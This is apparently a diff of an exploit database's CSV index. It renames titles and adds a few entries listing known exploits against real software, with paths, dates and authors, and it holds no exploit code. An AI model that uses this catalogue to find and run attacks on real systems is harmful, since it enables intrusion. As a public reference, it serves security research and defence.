 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0
-24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
+24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0
 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0
 24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0
@@ -21393,7 +21393,7 @@ id,file,description,date,author,platform,type,port
 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0
 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
-24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authentication Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
+24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0
 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
@@ -21491,7 +21491,7 @@ id,file,description,date,author,platform,type,port
 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0
-24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
+24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0
 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0
@@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port
 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
-24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution",2013-02-11,aeon,php,webapps,0
+24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
 24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
@@ -21669,7 +21669,7 @@ id,file,description,date,author,platform,type,port
 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0
 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0
 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0
-24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23
+24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23
 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0
 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0
 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0
@@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port
 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,Metasploit,windows,remote,0
 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,Metasploit,windows,remote,0
-24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload",2013-02-20,Metasploit,php,remote,0
+24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload",2013-02-20,Metasploit,php,remote,0
 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0
 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0
@@ -21711,7 +21711,7 @@ id,file,description,date,author,platform,type,port
 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0
 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0
-24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0
+24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload",2013-02-26,Metasploit,php,remote,0
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
@@ -21752,7 +21752,7 @@ id,file,description,date,author,platform,type,port
 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0
 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0
 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0
-24590,platforms/linux/dos/24590.txt,"Apache 2.0.x - mod_ssl Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
+24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0
 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0
 24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0
@@ -22315,7 +22315,7 @@ id,file,description,date,author,platform,type,port
 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0
 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0
 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0
-25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0
+25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload",2005-02-24,tjomka,php,webapps,0
 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0
 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0
 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0
@@ -22394,7 +22394,7 @@ id,file,description,date,author,platform,type,port
 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0
 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0
 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0
-25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0
+25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0
 25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0
 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0
 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0
@@ -22465,7 +22465,7 @@ id,file,description,date,author,platform,type,port
 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0
 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0
 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0
-25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0
+25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0
 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0
 25327,platforms/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0
 25328,platforms/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0
@@ -23548,7 +23548,7 @@ id,file,description,date,author,platform,type,port
 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module 'Username' Command Execution",2013-06-24,Metasploit,linux,remote,0
 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381
 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0
-26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0
+26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload",2013-06-24,Metasploit,linux,remote,0
 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0
 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0
 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0
@@ -24793,7 +24793,7 @@ id,file,description,date,author,platform,type,port
 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0
 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0
 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0
-28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption",2013-09-03,kingcope,hardware,remote,0
+28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0
 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0
 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0
 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0
@@ -25012,7 +25012,7 @@ id,file,description,date,author,platform,type,port
 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0
 27912,platforms/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0
 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0
-27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0
+27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0
 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,multiple,dos,0
 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0
 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - tiki-lastchanges.php Multiple Parameter Cross-Site Scripting",2006-05-29,Blwood,php,webapps,0
@@ -25268,7 +25268,7 @@ id,file,description,date,author,platform,type,port
 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0
 28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0
 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
-28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0
+28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0
 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0
 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0
 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0
@@ -25390,8 +25390,8 @@ id,file,description,date,author,platform,type,port
 28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution",2013-09-17,Metasploit,unix,remote,49152
 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443
 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Privilege Escalation",2013-09-17,Metasploit,windows,local,0
-28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
-28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443
+28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443
+28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443
 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900
 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0
 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0
@@ -26131,7 +26131,7 @@ id,file,description,date,author,platform,type,port
 29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0
 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
-29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
+29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0
 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
@@ -26561,7 +26561,7 @@ id,file,description,date,author,platform,type,port
 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0
 29523,platforms/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0
 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0
-29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload",2013-11-10,DevilScreaM,php,webapps,0
+29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps,0
 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0
 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0
@@ -26580,7 +26580,7 @@ id,file,description,date,author,platform,type,port
 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0
 39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0
 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0
-29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0
+29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0
 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0
 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0
 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0
@@ -26979,7 +26979,7 @@ id,file,description,date,author,platform,type,port
 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0
 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
-29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
+29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0
 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0
 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0
@@ -27173,7 +27173,7 @@ id,file,description,date,author,platform,type,port
 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
-30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
+30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Bypass Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0
 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
@@ -27602,7 +27602,7 @@ id,file,description,date,author,platform,type,port
 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0
 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection",2007-10-11,durito,php,webapps,0
-30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authorization Bypass",2007-10-11,MustLive,cgi,webapps,0
+30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0
 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0
 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0
 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - Merchant shop.php SQL Injection",2007-10-11,durito,php,webapps,0
@@ -28144,6 +28144,7 @@ id,file,description,date,author,platform,type,port
 31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
+40356,platforms/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos,0
 31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
 31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
@@ -28175,6 +28176,7 @@ id,file,description,date,author,platform,type,port
 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
